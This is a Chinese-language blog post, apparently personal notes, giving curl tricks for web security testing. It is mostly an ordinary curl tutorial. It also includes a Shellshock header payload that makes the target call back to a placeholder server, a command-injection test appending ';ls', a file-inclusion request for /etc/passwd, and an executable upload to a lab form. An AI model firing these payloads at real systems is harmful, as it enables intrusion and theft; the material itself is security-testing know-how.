前言
最近發現國外喜歡用curl來進行安全測試,於是記錄了一些tricks!
文章目錄
簡介
常用使用方法
http methods curl -XTRACE <url>
x-forwarded-for curl -H "X-Forwarded-For: 10.0.0.1" <url>
basic authentication curl -u <user>:<password> <url>
post form curl -XPOST --form "b=4_1" <url>
cookie curl --cookie "PHPSESSID=5ved46gn34dopkjhstrrfgdkk1;" <url>
cookie files (save & send) curl -c /tmp/cookie.txt -b /tmp/cookie.txt <url>
set user-agent curl -A "Mozilla" <url>
referer curl -H "Referer: https://www.cnn.com" <url>
json curl -XPOST -H "Content-Type: application/json" -d "[[\"create\",{\"type\":\"trial\",\"name\":\"bug\"}]] <url>
silent curl -s <url>
verbose curl -v <url>
ignore certifikate issues curl -k <url>
follow redircts curl -L <url>
redirect output into file curl -o <file> <url>
curl with proxy curl -x <proxy>:<port> <url>
curl SSL V3 curl -k -v --sslv3 <url>
curl max time (4 seconds) curl -m4 <url>
file upload curl -XPOST -F ul=30000 -F location=/tmp/upload-form-data.txt -F userfile=@/tmp/upload-file.txt <url>
shell-shock curl -k -L -H 'User-Agent: () { :;}; curl -L <return-server>;' <url>
post data from file curl -data '@<filename>' <url>
curl output response time curl -o /dev/null -w%{time_connect}:%{time_starttransfer}%{time_total} <url>
curl output request size curl -o /dev/null -w%{size_request} %{size_upload} <url>
curl output http status code curl -o /dev/null -w%%{http_code} <url>
curl resolve ip from other dns curl --resolve "www.cnn.com:80:8.8.8.8" http://www.cnn.com1. 獲取頁面內容
當我們不加任何選項使用 curl 時,默認會發送 GET 請求來獲取鏈接內容到標準輸出。
curl http://www.codebelief.com2. 顯示 HTTP 頭
如果我們只想要顯示 HTTP 頭,而不顯示文件內容,可以使用 -I 選項:
curl -I http://www.codebelief.com輸出爲:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 11 May 2017 08:24:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 24206
Connection: keep-alive
X-Powered-By: Express
Cache-Control: public, max-age=0
ETag: W/"5e8e-Yw5ZdnVVly9/aEnMX7fVXQ"
Vary: Accept-Encoding
也可以同時顯示 HTTP 頭和文件內容,使用 -i 選項:
curl -i http://www.codebelief.com輸出爲:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 11 May 2017 08:25:46 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 24206
Connection: keep-alive
X-Powered-By: Express
Cache-Control: public, max-age=0
ETag: W/"5e8e-Yw5ZdnVVly9/aEnMX7fVXQ"
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en">
......
</html>
3. 將鏈接保存到文件
我們可以使用 > 符號將輸出重定向到本地文件中。
curl http://www.codebelief.com > index.html也可以通過 curl 自帶的 -o/-O 選項將內容保存到文件中。
- -o(小寫的 o):結果會被保存到命令行中提供的文件名
- -O(大寫的 O):URL 中的文件名會被用作保存輸出的文件名
curl -o index.html http://www.codebelief.com
curl -O http://www.codebelief.com/page/2/注意:使用 -O 選項時,必須確保鏈接末尾包含文件名,否則 curl 無法正確保存文件。如果遇到鏈接中無文件名的情況,應該使用 -o 選項手動指定文件名,或使用重定向符號。
4. 同時下載多個文件
我們可以使用 -o 或 -O 選項來同時指定多個鏈接,按照以下格式編寫命令:
curl -O http://www.codebelief.com/page/2/ -O http://www.codebelief.com/page/3/或者:
curl -o page1.html http://www.codebelief.com/page/1/ -o page2.html http://www.codebelief.com/page/2/5. 使用 -L 跟隨鏈接重定向
如果直接使用 curl 打開某些被重定向後的鏈接,這種情況下就無法獲取我們想要的網頁內容。例如:
curl http://codebelief.com會得到如下提示:
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.10.3</center>
</body>
</html>而當我們通過瀏覽器打開該鏈接時,會自動跳轉到 http://www.codebelief.com。此時我們想要 curl 做的,就是像瀏覽器一樣跟隨鏈接的跳轉,獲取最終的網頁內容。我們可以在命令中添加 -L 選項來跟隨鏈接重定向:
curl -L http://codebelief.com這樣我們就能獲取到經過重定向後的網頁內容了。
6. 使用 -A 自定義 User-Agent
我們可以使用 -A 來自定義用戶代理,例如下面的命令將僞裝成安卓火狐瀏覽器對網頁進行請求:
curl -A "Mozilla/5.0 (Android; Mobile; rv:35.0) Gecko/35.0 Firefox/35.0" http://www.baidu.com下面我們會使用 -H 來實現同樣的目的。
7. 使用 -H 自定義 header
當我們需要傳遞特定的 header 的時候,可以仿照以下命令來寫:
curl -H "Referer: www.example.com" -H "User-Agent: Custom-User-Agent" http://www.baidu.com可以看到,當我們使用 -H 來自定義 User-Agent 時,需要使用 “User-Agent: xxx” 的格式。
我們能夠直接在 header 中傳遞 Cookie,格式與上面的例子一樣:
curl -H "Cookie: JSESSIONID=D0112A5063D938586B659EF8F939BE24" http://www.example.com另一種方式會在下面介紹。
8. 使用 -c 保存 Cookie
當我們使用 cURL 訪問頁面的時候,默認是不會保存 Cookie 的。有些情況下我們希望保存 Cookie 以便下次訪問時使用。例如登陸了某個網站,我們希望再次訪問該網站時保持登陸的狀態,這時就可以現將登陸時的 Cookie 保存起來,下次訪問時再讀取。
-c 後面跟上要保存的文件名。
curl -c "cookie-example" http://www.example.com9. 使用 -b 讀取 Cookie
前面講到了使用 -H 來發送 Cookie 的方法,這種方式是直接將 Cookie 字符串寫在命令中。如果使用 -b 來自定義 Cookie,命令如下:
curl -b "JSESSIONID=D0112A5063D938586B659EF8F939BE24" http://www.example.com如果要從文件中讀取 Cookie,-H 就無能爲力了,此時可以使用 -b 來達到這一目的:
curl -b "cookie-example" http://www.example.com即 -b 後面既可以是 Cookie 字符串,也可以是保存了 Cookie 的文件名。
10. 使用 -d 發送 POST 請求
我們以登陸網頁爲例來進行說明使用 cURL 發送 POST 請求的方法。假設有一個登錄頁面 www.example.com/login,只需要提交用戶名和密碼便可登錄。我們可以使用 cURL 來完成這一 POST 請求,-d 用於指定發送的數據,-X 用於指定發送數據的方式:
curl -d "userName=tom&passwd=123456" -X POST http://www.example.com/login在使用 -d 的情況下,如果省略 -X,則默認爲 POST 方式:
curl -d "userName=tom&passwd=123456" http://www.example.com/login強制使用 GET 方式
發送數據時,不僅可以使用 POST 方式,也可以使用 GET 方式,例如:
curl -d "somedata" -X GET http://www.example.com/api或者使用 -G 選項:
curl -d "somedata" -G http://www.example.com/api從文件中讀取 data
curl -d "@data.txt" http://www.example.com/login帶 Cookie 登錄
當然,如果我們再次訪問該網站,仍然會變成未登錄的狀態。我們可以用之前提到的方法保存 Cookie,在每次訪問網站時都帶上該 Cookie 以保持登錄狀態。
curl -c "cookie-login" -d "userName=tom&passwd=123456" http://www.example.com/login再次訪問該網站時,使用以下命令:
curl -b "cookie-login" http://www.example.com/login這樣,就能保持訪問的是登錄後的頁面了。
使用實例
測試命令執行漏洞
語句:curl "//192.168.0.16/commandexec/example1.php?127.0.0.1;ls"
效果:
測試下載文件
語句:curl -O //the.earth.li/~sgtatham/putty/latest/putty.exe
測試文件包含
語句:curl http://192.168.0.16/fileincl/example.php?page=/etc/passwd
HTTP Headers
如果你想驗證你訪問的服務器支持哪種http methods,可以使用以下命令,這個技巧有時候會有用!
curl -v -X OPTIONS http://www.google.com
可以看到google支持的是GET,HEAD方法!
HTTP Authentication
語句:curl --data "uname=test&pass=test" http://testphp.vulnweb.com/userinfo.php
File Upload
如果網站允許上傳圖像或文本,你可以使用這個測試,例如在Facebook上傳圖像。使用curl命令上傳目標系統上的putty.exe文件。
語句:curl -F 'image=@/root/Desktop/putty.exe' http://192.168.0.16/upload/example1.php
Others
curl還可以配合解析xml,json的腳本程序使用用來解析網頁!配合bash命令如grep可以過濾一些內容!且curl在一些版本場合還存在命令執行漏洞,這裏不再延伸!